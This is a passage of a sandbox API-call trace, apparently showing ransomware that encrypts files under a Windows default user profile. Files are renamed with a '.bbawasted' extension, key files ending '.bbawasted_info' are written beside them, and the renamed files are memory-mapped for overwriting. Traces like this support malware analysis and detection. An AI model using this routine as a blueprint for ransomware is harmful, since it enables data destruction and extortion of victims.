hProv=0x5d0908, dwLen=0x1b8, pbBuffer=0x5d0748 | out: pbBuffer=0x5d0748) returned 1 [0077.556] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0077.556] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5d0908) returned 1 [0077.556] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0077.556] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0077.565] SetEndOfFile (hFile=0x11c) returned 1 [0077.567] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0077.568] CloseHandle (hObject=0x11c) returned 1 [0077.569] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5afbd8 | out: hHeap=0x580000) returned 1 [0077.569] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0077.570] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0077.570] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.570] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url") returned 58 [0077.570] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x27e) returned 0x5afbd8 [0077.570] lstrcpyW (in: lpString1=0x5afc4c, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0077.570] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0077.570] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0077.571] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0077.571] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.571] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url.bbawasted_info" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn sports.url.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0077.572] WriteFile (in: hFile=0x11c, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0077.573] SetEndOfFile (hFile=0x11c) returned 1 [0077.573] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.573] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0077.573] lstrcpyW (in: lpString1=0x5afc4c, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0077.573] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn sports.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url.bbawasted" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn sports.url.bbawasted")) returned 1 [0077.574] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url.bbawasted" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn sports.url.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0077.574] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0077.574] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5d0908) returned 1 [0077.575] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x1b8, pbBuffer=0x5d0748 | out: pbBuffer=0x5d0748) returned 1 [0077.575] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0077.575] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5d0908) returned 1 [0077.576] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0077.576] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0077.600] SetEndOfFile (hFile=0x11c) returned 1 [0077.602] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0077.602] CloseHandle (hObject=0x11c) returned 1 [0077.604] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5afbd8 | out: hHeap=0x580000) returned 1 [0077.604] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0077.605] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0077.605] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.605] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url") returned 58 [0077.605] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x27e) returned 0x5afbd8 [0077.605] lstrcpyW (in: lpString1=0x5afc4c, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0077.605] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0077.605] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0077.606] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0077.606] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.606] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url.bbawasted_info" (normalized: "c:\\users\\default\\favorites\\msn websites\\msnbc news.url.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0077.606] WriteFile (in: hFile=0x11c, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0077.607] SetEndOfFile (hFile=0x11c) returned 1 [0077.607] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.607] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0077.607] lstrcpyW (in: lpString1=0x5afc4c, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0077.607] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msnbc news.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url.bbawasted" (normalized: "c:\\users\\default\\favorites\\msn websites\\msnbc news.url.bbawasted")) returned 1 [0077.660] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url.bbawasted" (normalized: "c:\\users\\default\\favorites\\msn websites\\msnbc news.url.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0077.660] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0077.660] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5d0908) returned 1 [0077.661] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x1b8, pbBuffer=0x5d0748 | out: pbBuffer=0x5d0748) returned 1 [0077.661] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0077.661] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5d0908) returned 1 [0077.662] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0077.662] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0077.671] SetEndOfFile (hFile=0x11c) returned 1 [0077.673] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0077.673] CloseHandle (hObject=0x11c) returned 1 [0077.674] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5afbd8 | out: hHeap=0x580000) returned 1 [0077.674] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0077.675] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0077.675] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.675] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url") returned 68 [0077.675] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x292) returned 0x5d2990 [0077.675] lstrcpyW (in: lpString1=0x5d2a18, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0077.675] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5e1fb0 [0077.675] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0077.676] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5e1fb0 | out: pbBuffer=0x5e1fb0) returned 1 [0077.676] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.676] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url.bbawasted_info" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live gallery.url.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0077.677] WriteFile (in: hFile=0x11c, lpBuffer=0x5e1fb0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5e1fb0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0077.678] SetEndOfFile (hFile=0x11c) returned 1 [0077.678] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.678] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0077.678] lstrcpyW (in: lpString1=0x5d2a18, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0077.678] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live gallery.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url.bbawasted" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live gallery.url.bbawasted")) returned 1 [0077.679] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url.bbawasted" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live gallery.url.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0077.679] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0077.680] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5d0908) returned 1 [0077.680] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x1b8, pbBuffer=0x5d0748 | out: pbBuffer=0x5d0748) returned 1 [0077.680] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0077.680] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5d0908) returned 1 [0077.681] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0077.681] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0077.690] SetEndOfFile (hFile=0x11c) returned 1 [0077.692] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0077.692] CloseHandle (hObject=0x11c) returned 1 [0077.740] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d2990 | out: hHeap=0x580000) returned 1 [0077.740] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0077.741] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0077.741] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.741] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG") returned 35 [0077.741] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x250) returned 0x5d0700 [0077.741] lstrcpyW (in: lpString1=0x5d0746, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0077.741] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5e1fb0 [0077.741] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0077.742] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5e1fb0 | out: pbBuffer=0x5e1fb0) returned 1 [0077.742] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.742] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG.bbawasted_info" (normalized: "c:\\users\\default\\ntuser.dat.log.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0077.743] WriteFile (in: hFile=0x11c, lpBuffer=0x5e1fb0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5e1fb0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0077.743] SetEndOfFile (hFile=0x11c) returned 1 [0077.744] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.744] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0077.744] lstrcpyW (in: lpString1=0x5d0746, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0077.744] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG" (normalized: "c:\\users\\default\\ntuser.dat.log"), lpNewFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG.bbawasted" (normalized: "c:\\users\\default\\ntuser.dat.log.bbawasted")) returned 1 [0077.745] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG.bbawasted" (normalized: "c:\\users\\default\\ntuser.dat.log.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0077.745] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0077.763] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0077.764] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5d29d8 | out: pbBuffer=0x5d29d8) returned 1 [0077.764] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.764] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0077.765] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0077.765] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.773] SetEndOfFile (hFile=0x11c) returned 1 [0077.775] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0077.776] CloseHandle (hObject=0x11c) returned 1 [0077.777] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d0700 | out: hHeap=0x580000) returned 1 [0077.777] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0077.778] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0077.778] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.778] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 76 [0077.778] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2a2) returned 0x5d2990 [0077.778] lstrcpyW (in: lpString1=0x5d2a28, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0077.778] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0077.778] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0077.779] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0077.779] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.779] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.bbawasted_info" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0077.780] WriteFile (in: hFile=0x11c, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0077.781] SetEndOfFile (hFile=0x11c) returned 1 [0077.781] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.781] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0077.781] lstrcpyW (in: lpString1=0x5d2a28, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0077.781] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf"), lpNewFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.bbawasted" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf.bbawasted")) returned 1 [0077.785] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.bbawasted" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0077.785] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0077.790] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5d0908) returned 1 [0077.791] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x1b8, pbBuffer=0x5d0748 | out: pbBuffer=0x5d0748) returned 1 [0077.791] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0077.791] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5d0908) returned 1 [0077.792] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0077.792] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0077.801] SetEndOfFile (hFile=0x11c) returned 1 [0077.803] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0077.803] CloseHandle (hObject=0x11c) returned 1 [0077.804] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d2990 | out: hHeap=0x580000) returned 1 [0077.804] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0077.805] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0077.805] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.805] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 113 [0077.805] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2ec) returned 0x5d2990 [0077.805] lstrcpyW (in: lpString1=0x5d2a72, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0077.805] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0077.805] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0077.806] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0077.806] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.806] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.bbawasted_info" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0077.807] WriteFile (in: hFile=0x11c, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0077.808] SetEndOfFile (hFile=0x11c) returned 1 [0077.808] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.808] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0077.808] lstrcpyW (in: lpString1=0x5d2a72, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0077.808] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms"), lpNewFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.bbawasted" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms.bbawasted")) returned 1 [0077.809] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.bbawasted" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0077.809] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0077.867] 